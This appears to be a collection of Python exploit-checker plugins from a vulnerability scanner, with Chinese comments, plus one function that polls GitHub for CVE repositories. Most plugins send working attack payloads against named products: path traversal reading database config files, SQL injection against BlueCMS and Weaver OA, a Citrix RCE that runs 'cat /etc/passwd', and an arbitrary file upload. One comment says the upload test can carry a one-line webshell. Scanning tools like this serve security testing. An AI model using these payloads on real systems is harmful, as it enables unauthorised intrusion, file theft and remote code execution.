def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/admin/databack/download.html?name=../application/database.php" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("数据库名") != -1: Medusa = "{}存在BearAdmin任意文件下载漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': RandomAgent, } resp = requests.get(payload_url, headers=headers, timeout=5, verify=False) con = resp.text code = resp.status_code if code == 200: m = re.search(r'No error in <b>([^<]+)</b>', con) if m: Medusa = "{}存在泛微任意文件下载漏洞 \r\n漏洞详情:\r\nPayload:{}\r\n".format( url, payload_url) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/ad_js.php?ad_id=1%20and%201=2%20union%20select%201,2,3,4,5,md5(3.1415),md5(3.1415)" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.get(payload_url, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if con.find("63e1f04640e83605c1d177544a5a0488") != -1: Medusa = "{}存在BlueCMSSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回内容:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except Exception: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = ClassCongregation.Proxies().result(proxies) scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port payload = "/vpn/../vpns/portal/scripts/newbm.pl" payload_url = scheme + "://" + url + ":" + str(port) + payload randoms = rand() try: headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, "Connection": "close", "NSC_USER": "******".format(randoms), "NSC_NONCE": "nsroot" } data = "url=http://example.com&title={}&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]".format( randoms) resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=5, verify=False, allow_redirects=False) con = resp.text code = resp.status_code if code == 200 and con.find("parent.window.ns_reload") != -1: payload_url2 = scheme + "://" + url + ":" + str( port) + '/vpn/../vpns/portal/{}.xml'.format(randoms) headers2 = { "NSC_USER": "******", "NSC_NONCE": "nsroot", "Upgrade-Insecure-Requests": "1", "Cache-Control": "max-age=0", 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': RandomAgent, } resp2 = requests.get(payload_url2, headers=headers2, proxies=proxies, timeout=5, verify=False) con2 = resp2.text code2 = resp2.status_code if code2 == 200 and con2.find("root:") != -1 and con2.find( "bin:") != -1 and con2.find("/root") != -1: Medusa = "{} 存在Citrix远程代码执行漏洞\r\n漏洞地址:\r\n{}\r\n使用POST数据包:\r\n{}\r\n返回数据包:\r\n{}\r\n".format( url, payload_url2, data, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, **kwargs).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名 # if __name__ == '__main__': # # with open(r'../123.txt', 'r') as file: # content_lists = file.readlines() # url = [x.strip() for x in content_lists] # for l in url: # medusa(l) #medusa("http://","Mozilla/5.0(compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)")
def Monitor(): try: headers = { 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36", } GitCveApi = requests.get( "https://api.github.com/search/repositories?q=" + github_cve_monitor_key + "&sort=updated&order=desc", headers=headers, timeout=10) GitCveApiJson = json.loads(GitCveApi.text) DataExtraction = GitCveApiJson["items"] for i in DataExtraction: GithubId = i["id"] Name = i["name"] HtmlUrl = i["html_url"] CreatedAt = dateutil.parser.parse(i["created_at"]).astimezone( pytz.timezone('Asia/Shanghai')) # 解析string 并转换为北京时区 Created = str(int(time.mktime(CreatedAt.timetuple()))) # 转换为时间戳 UpdatedAt = dateutil.parser.parse(i["updated_at"]).astimezone( pytz.timezone('Asia/Shanghai')) # 解析string 并转换为北京时区 Updated = str(int(time.mktime(UpdatedAt.timetuple()))) # 转换为时间戳 PushedAt = dateutil.parser.parse(i["pushed_at"]).astimezone( pytz.timezone('Asia/Shanghai')) # 解析string 并转换为北京时区 Pushed = str(int(time.mktime(PushedAt.timetuple()))) # 转换为时间戳 ForksCount = i["forks_count"] WatchersCount = i["watchers_count"] GithubCveSekect = GithubCve( id=GithubId, name=Name, html_url=HtmlUrl, created_at=Created, updated_at=Updated, pushed_at=Pushed, forks_count=ForksCount, watchers_count=WatchersCount).Judgment() #先查询数据库 if GithubCveSekect: GithubCve(id=GithubId, name=Name, html_url=HtmlUrl, created_at=Created, updated_at=Updated, pushed_at=Pushed, forks_count=ForksCount, watchers_count=WatchersCount).Update() #如果存在就更新 else: GithubCve(id=GithubId, name=Name, html_url=HtmlUrl, created_at=Created, updated_at=Updated, pushed_at=Pushed, forks_count=ForksCount, watchers_count=WatchersCount).Write() #如果不存在就写入 except Exception as e: ClassCongregation.ErrorLog().Write( "Web_CVE_GithubMonitoring_Github_Monitor(def)", e)
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/library/editornew/Editor/img_save.asp" payload_url = scheme + "://" + url + ":" + str(port) + payload data = ''' ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_src"; filename="123.cer" Content-Type: application/x-x509-ca-cert testvul ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="Submit" 提交 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_alt" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_align" baseline ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_border" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="newid" 45 ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_hspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA Content-Disposition: form-data; name="img_vspace" ------WebKitFormBoundaryNjZKAB66SVyL1INA-- ''' headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text match = re.search(r'getimg\(\'([\d]+.cer)\'\)', con) if match: payload_url2 = scheme + "://" + url + ":" + str( port) + "/library/editornew/Editor/NewImage/" + match.group(1) resp2 = s.get(payload_url2, headers=headers, timeout=6, verify=False) con2 = resp2.text code2 = resp2.status_code #如果要上传shell直接把testvul这个值改为一句话就可以 if code2 == 200 and con2.lower().find("testvul") != -1: Medusa = "{}存在一采通电子采购系统任意文件上传漏洞\r\n 验证数据:\r\nshell地址:{}\r\n内容:{}\r\n".format( url, payload_url2, con2) _t = VulnerabilityInfo(Medusa) ClassCongregation.VulnerabilityDetails( _t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 ClassCongregation.WriteFile().result( str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ClassCongregation.ErrorHandling().Outlier(e, _) _l = ClassCongregation.ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, ProxyIp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port global resp global resp2 try: payload = "/mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333" payload_url = scheme + "://" + url + ':' + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() if ProxyIp != None: proxies = { # "http": "http://" + str(ProxyIps) , # 使用代理前面一定要加http://或者https:// "http": "http://" + str(ProxyIp) } resp = s.post(payload_url, data={ 'formids': '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1' }, headers=headers, timeout=6, proxies=proxies, verify=False) elif ProxyIp == None: resp = s.post(payload_url, data={ 'formids': '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1' }, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.lower( ).find('''"draggable":''') != -1 and con.lower( ).find('''"checked":''') != -1 and con.lower().find( '''"id":''') != -1 and con.lower().find('''"text":''') != -1: Medusa = "{}存在泛微OA_WorkflowCenterTreeData接口注入漏洞\r\n 验证数据:\r\nUrl:{}\r\nPayload:{}\r\n".format( url, payload_url, '11111111111)))' + '\x0a\x0d' * 360 + 'union select NULL,instance_name from ' 'v$instance order by (((1') _t = VulnerabilityInfo(Medusa) web = ClassCongregation.VulnerabilityDetails(_t.info) web.High() # serious表示严重,High表示高危,Intermediate表示中危,Low表示低危 return (str(_t.info)) except: _ = VulnerabilityInfo('').info.get('algroup') _l = ClassCongregation.ErrorLog().Write(url, _) #调用写入类